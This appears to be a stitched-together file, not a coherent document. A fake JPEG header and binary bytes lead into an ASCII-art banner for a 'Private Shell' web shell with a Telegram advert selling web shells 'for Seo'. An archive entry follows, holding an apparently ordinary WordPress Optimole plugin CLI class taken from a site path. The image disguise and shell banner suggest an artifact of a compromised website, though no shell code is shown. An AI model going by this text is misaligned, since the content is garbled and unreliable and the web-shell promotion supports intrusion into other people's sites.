����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
home/eliteafr/datapro/wp-content/plugins/optimole-wp/inc/cli.php 0000666 00000001514 15220503241 0021004 0 ustar 00 <?php
/**
* CLI class.
*
* Author: Bogdan Preda <bogdan.preda@themeisle.com>
* Created on: 19/07/2018
*
* @package \Optimole\Inc
* @author Optimole <friends@optimole.com>
*/
/**
* Class Optml_Cli
*/
class Optml_Cli {
/**
* Api version.
*
* @var string Version string.
*/
const CLI_NAMESPACE = 'optimole';
/**
* CLI controllers
*
* @var array List of CLI controllers.
*/
private $commands = [
'setting',
'media',
];
/**
* Optml_Cli constructor.
*/
public function __construct() {
foreach ( $this->commands as $command ) {
$class_name = 'Optml_Cli_' . ucfirst( $command );
$controller = new $class_name();
try {
\WP_CLI::add_command( self::CLI_NAMESPACE . ' ' . $command, $controller );
} catch ( \Exception $e ) {
// TODO Log this exception.
}
}
}
}